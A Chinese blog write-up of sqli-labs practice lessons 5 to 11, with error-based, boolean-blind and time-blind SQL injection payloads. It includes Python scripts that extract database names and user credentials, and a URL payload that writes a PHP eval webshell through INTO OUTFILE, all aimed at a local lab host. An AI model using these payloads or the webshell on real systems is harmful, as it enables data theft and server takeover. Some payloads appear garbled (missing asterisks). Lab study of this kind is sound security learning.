当前位置: 开发笔记 > 编程语言 > 正文

sqlilabs(511)

作者：D大龙 | 来源：互联网 | 2023-09-13 18:38

5&6子查询注入有mysql的错误显示本质是floor(rand)函数与group组合情况下的报错参考文章:https:www.cnblogs.comBloodZerop46609

5&6 子查询注入
有mysql的错误显示

本质是floor(rand)函数与group组合情况下的报错

参考文章:https://www.cnblogs.com/BloodZero/p/4660971.html
payload1:查询库名 mysql> SELECT * FROM users WHERE id='0'union select 1,count(),concat_ws(':',(select database()),floor(rand()2)) as a from information_schema.tables group by a; ERROR 1062 (23000): Duplicate entry 'security:1' for key 'group_key' payload2：查询表名 mysql> SELECT * FROM users WHERE id='0'union select 1,count(),concat_ws(':',(select table_name from information_schema.tables),floor(rand()2)) as a from information_schema.tables where table_schema='security' group by a; ERROR 1242 (21000): Subquery returns more than 1 row 这里提示说结果子查询超出一行，确认问题是处在这里
payload3:用limit一个一个查询表名 mysql> SELECT * FROM users WHERE id='0'union select 1,count(),concat_ws(':',(select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()2)) as a from information_schema.tables where table_schema='security' group by a; ERROR 1062 (23000): Duplicate entry 'users:1' for key 'group_key' payload4：查询列名 mysql> SELECT * FROM users WHERE id='0'union select 1,count(),concat_ws(':',(select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand()2)) as a from information_schema.tables where table_schema='security' group by a; ERROR 1062 (23000): Duplicate entry 'username:1' for key 'group_key' payload：查询内容 mysql> SELECT * FROM users WHERE id='0'union select 1,count(),concat_ws(':',(select concat(username) from users limit 0,1),floor(rand()2)) as a from information_schema.tables where table_schema='security' group by a; ERROR 1062 (23000): Duplicate entry 'Dumb:0' for key 'group_key'

6与5差别在单引号和双引号

`payload:http://sql.test/Less-6/?id=1%22union%20select%20null,count(),concat_ws(%27:%27,(select%20username%20from%20users%20limit%200,1),floor(rand()2))as%20a%20from%20information_schema.tables%20group%20by%20a--+`

7 利用文件写入一句话木马
首先吐槽一下这里的闭合方式，试了半天没办法看代码才知道，两个括号。。。

这一题需要用sql语句来进行文件操作。

需要用到函数`select 'xxx' into outfile 'xxx';`

用到这个的时候需要文件的绝对地址，而我们只能凭借经验来猜测。

根据系统和数据库猜测，如winserver的iis默认路径是c:/inetpub/wwwroot/，这好像说偏了，这是asp的，但知道也好

linux的nginx一般是/usr/local/nginx/html，/home/wwwroot/default，/usr/share/nginx，/var/www/htm等

apache 就/var/www/htm，/var/www/html/htdocs

`payload:http://sql.test/Less-7/?id=0%27))union%20select%20null,null,%27%3C?php%20@eval($_POST[a]);?%3E%27into%20outfile%20%22D:/sqli-labs-master/test.php%22--+`

8 布尔盲注
就是相比第五题关闭了报错显示

分析一下语句:SELECT * FROM users WHERE id='1'and ((select database())='secrity')-- ' LIMIT 0,1

无报错,根据是否返回you are in...来判断sql执行结果

那么找到可以执行的语句
`mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>200); Empty set (0.00 sec) mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>2); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec)`
附上脚本
import requests from tqdm import tqdm import time def bp(name,payload): for j in tqdm(range(1, 200)): min = 33 max = 127 while abs(min - max) > 1: # s mid = int((min + max) * 0.5) payloadd = payload.format(str(j), str(mid)) rsp = requests.get(url=url + payloadd) rsp.encoding = 'utf-8' if ("You are in..." in rsp.text): min = mid else: max = mid # print(str(min)+"-"+str(max)) name += chr(max) print(name) if(name[-1:]==name[-2:-1]): break return name url="http://sql.test/Less-8/" databasename="" tablename="" t1=time.time() payload1 = '?id=1%27and%20(ascii(mid(database(),{},1))>{})%23' databasename=bp(databasename,payload1) payload2 ="?id=1%27and%20(ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{})%23" tablename=bp(tablename,payload2) t2=time.time() print("总共时长为:") print(t2-t1) print(databasename+"\n"+tablename) #下面是第二个脚本 import requests from tqdm import tqdm def bp(name,payload): for j in tqdm(range(1, 200)): min = 33 max = 127 while abs(min - max) > 1: # s mid = int((min + max) * 0.5) payloadd = payload.format(str(j), str(mid)) rsp = requests.get(url=url + payloadd) rsp.encoding = 'utf-8' if ("You are in..." in rsp.text): min = mid else: max = mid # print(str(min)+"-"+str(max)) name += chr(max) print(name) if(name[-1:]==name[-2:-1]): break return name url="http://sql.test/Less-8/" usernamepassword="" payload3 ="?id=1%27and%20(ascii(mid((select%20group_concat(username,':',password%20separator%20' ')%20from%20users),{},1))>{})%23" usernamepassword=bp(usernamepassword,payload3) print(usernamepassword)

9 时间盲注
看一下源码,不论sql查询语句的结果是否为空都返回you are in...

想办法构造一下payload,测试成功：`?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+`

import requests from tqdm import tqdm import time def bp(name,payload): for j in tqdm(range(1, 200)): min = 33 max = 127 while abs(min - max) > 1: # s mid = int((min + max) * 0.5) payloadd = payload.format(str(j), str(mid)) # print() t1=time.time() rsp = requests.get(url=url + payloadd) rsp.encoding = 'utf-8' t2=time.time() if (t2-t1>5): min = mid else: max = mid # print(str(min)+"-"+str(max)) name += chr(max) print(name) if(name[-1:]==name[-2:-1]): break return name databasename ='' tablename ='' url="http://sql.test/Less-9/" # payload1 = '?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+' # databasename=bp(databasename,payload1) databasename='security' payload2 ="?id=0%27or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+" tablename=bp(tablename,payload2) #下面是求字段的脚本 #这里的payload写了好久，太长了容易看错，需要仔细一点 import requests import time from tqdm import tqdm def bp(name,payload): for j in tqdm(range(1, 200)): min = 33 max = 127 while abs(min - max) > 1: # s mid = int((min + max) * 0.5) payloadd = payload.format(str(j), str(mid)) t1 = time.time() rsp = requests.get(url=url + payloadd) rsp.encoding = 'utf-8' t2 = time.time() if (t2 - t1 > 5): min = mid else: max = mid # print(str(min)+"-"+str(max)) name += chr(max) print(name) if(name[-1:]==name[-2:-1]): break return name url="http://sql.test/Less-9/" usernamepassword="" # payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator ' ') from users),{},1))>{}),sleep(0.3),0)%23" # payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator ' ') from users),{},1)>{}),sleep(0.3),0)%23" payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator ' ')from users),{},1))>{}),sleep(0.3),0)--+" usernamepassword=bp(usernamepassword,payload3) print(usernamepassword)

10
相比于第九题将单引号改成了双引号
import requests from tqdm import tqdm import time def bp(name,payload): for j in tqdm(range(1, 200)): min = 33 max = 127 while abs(min - max) > 1: # s mid = int((min + max) * 0.5) payloadd = payload.format(str(j), str(mid)) # print() t1=time.time() rsp = requests.get(url=url + payloadd) rsp.encoding = 'utf-8' t2=time.time() if (t2-t1>5): min = mid else: max = mid # print(str(min)+"-"+str(max)) name += chr(max) print(name) if(name[-1:]==name[-2:-1]): break return name databasename ='' tablename ='' url="http://sql.test/Less-10/" payload1 ='?id=0"or if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+' databasename=bp(databasename,payload1) databasename='security' payload2 ='?id=0"or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+' tablename=bp(tablename,payload2) #下面是求字段的脚本 # import requests # import time # from tqdm import tqdm # # def bp(name,payload): # for j in tqdm(range(1, 200)): # min = 33 # max = 127 # while abs(min - max) > 1: # s # mid = int((min + max) * 0.5) # payloadd = payload.format(str(j), str(mid)) # t1 = time.time() # rsp = requests.get(url=url + payloadd) # rsp.encoding = 'utf-8' # t2 = time.time() # if (t2 - t1 > 5): # min = mid # else: # max = mid # # print(str(min)+"-"+str(max)) # name += chr(max) # print(name) # if(name[-1:]==name[-2:-1]): # break # return name # # url="http://sql.test/Less-9/" # usernamepassword="" # # payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator ' ') from users),{},1))>{}),sleep(0.3),0)%23" # # payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator ' ') from users),{},1)>{}),sleep(0.3),0)%23" # payload3 ='?id=0"or%20if((ascii(mid((select group_concat(username,':',password separator ' ')from users),{},1))>{}),sleep(0.3),0)--+' # usernamepassword=bp(usernamepassword,payload3) # print(usernamepassword)

11 报错注入
非标准解法

推荐阅读

php
解决Mac上无法使用localhost连接mysql的问题

本文介绍了在Mac上搭建php环境后无法使用localhost连接mysql的问题，并通过将localhost替换为127.0.0.1或本机IP解决了该问题。文章解释了localhost和127.0.0.1的区别，指出了使用socket方式连接导致连接失败的原因。此外，还提供了相关链接供读者深入了解。 ... [详细]

蜡笔小新 2023-12-13 17:48:58
format
Oracle Database 10g许可授予信息及高级功能详解

本文介绍了Oracle Database 10g许可授予信息及其中的高级功能，包括数据库优化数据包、SQL访问指导、SQL优化指导、SQL优化集和重组对象。同时提供了详细说明，指导用户在Oracle Database 10g中如何使用这些功能。 ... [详细]

蜡笔小新 2023-12-14 13:12:10
format
MySQL表分区的创建、增加和删除方法详解

本文详细介绍了MySQL表分区的创建、增加和删除方法，包括查看分区数据量和全库数据量的方法。欢迎大家阅读并给予点评。 ... [详细]

蜡笔小新 2023-12-13 12:26:11
web
搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的详细步骤

本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的步骤，包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ... [详细]

蜡笔小新 2023-12-14 17:03:58
web
【译】发送表单数据

这是原文链接：sendingformdata许多情况下，我们使用表单发送数据到服务器。服务器处理数据并返回响应给用户。这看起来很简单，但是 ... [详细]

蜡笔小新 2023-12-14 16:19:10
int
数据库的存储结构及其重要性

本文介绍了数据库的存储结构及其重要性，强调了关系数据库范例中将逻辑存储与物理存储分开的必要性。通过逻辑结构和物理结构的分离，可以实现对物理存储的重新组织和数据库的迁移，而应用程序不会察觉到任何更改。文章还展示了Oracle数据库的逻辑结构和物理结构，并介绍了表空间的概念和作用。 ... [详细]

蜡笔小新 2023-12-14 16:00:02
php
Windows下配置PHP5.6的方法及注意事项

本文介绍了在Windows系统下配置PHP5.6的步骤及注意事项，包括下载PHP5.6、解压并配置IIS、添加模块映射、测试等。同时提供了一些常见问题的解决方法，如下载缺失的msvcr110.dll文件等。通过本文的指导，读者可以轻松地在Windows系统下配置PHP5.6，并解决一些常见的配置问题。 ... [详细]

蜡笔小新 2023-12-14 12:37:25
web
知识图谱——机器大脑中的知识库

本文介绍了知识图谱在机器大脑中的应用，以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例，说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案，如搜索关键词"Marie Curie"，会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革，不仅美国的微软必应，中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细]

蜡笔小新 2023-12-14 10:06:19
header
开发笔记：解决播放框架内容安全策略设置不起作用的问题

本文介绍了作者在开发过程中遇到的问题，即播放框架内容安全策略设置不起作用的错误。作者通过使用编译时依赖注入的方式解决了这个问题，并分享了解决方案。文章详细描述了问题的出现情况、错误输出内容以及解决方案的具体步骤。如果你也遇到了类似的问题，本文可能对你有一定的参考价值。 ... [详细]

蜡笔小新 2023-12-13 16:03:19
version
r2dbc配置多数据源

R2dbc配置多数据源问题根据官网配置r2dbc连接mysql多数据源所遇到的问题pom配置可以参考官网,不过我这样配置会报错我并没有这样配置将以下内容添加到pom.xml文件d ... [详细]

蜡笔小新 2023-12-12 16:38:53
version
Windows7 64位系统安装PLSQL Developer的步骤和注意事项

本文介绍了在Windows7 64位系统上安装PLSQL Developer的步骤和注意事项。首先下载并安装PLSQL Developer，注意不要安装在默认目录下。然后下载Windows 32位的oracle instant client，并解压到指定路径。最后，按照自己的喜好对解压后的文件进行命名和压缩。 ... [详细]

蜡笔小新 2023-12-12 13:32:08
web
to_a和to_ary有什么区别？ - What's the difference between to_a and to_ary?

Whatsthedifferencebetweento_aandto_ary?to_a和to_ary有什么区别？ ... [详细]

蜡笔小新 2023-12-11 19:30:04
web
GSIOpenSSH PAM_USER 安全绕过漏洞

漏洞名称：GSI-OpenSSHPAM_USER安全绕过漏洞CNNVD编号：CNNVD-201304-097发布时间：2013-04-09 ... [详细]

蜡笔小新 2023-12-10 06:34:54
web
Apache Shiro 身份验证绕过漏洞 (CVE202011989) 详细解析及防范措施

本文详细解析了Apache Shiro 身份验证绕过漏洞 (CVE202011989) 的原理和影响，并提供了相应的防范措施。Apache Shiro 是一个强大且易用的Java安全框架，常用于执行身份验证、授权、密码和会话管理。在Apache Shiro 1.5.3之前的版本中，与Spring控制器一起使用时，存在特制请求可能导致身份验证绕过的漏洞。本文还介绍了该漏洞的具体细节，并给出了防范该漏洞的建议措施。 ... [详细]

蜡笔小新 2023-12-09 19:58:36
web
http头_http头部注入

1、http头部注入分析1、原理 ... [详细]

蜡笔小新 2023-10-17 15:20:14

D大龙

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章

sqlilabs(511)

11 报错注入非标准解法 var cpro_id = "u6885494";

11 报错注入
非标准解法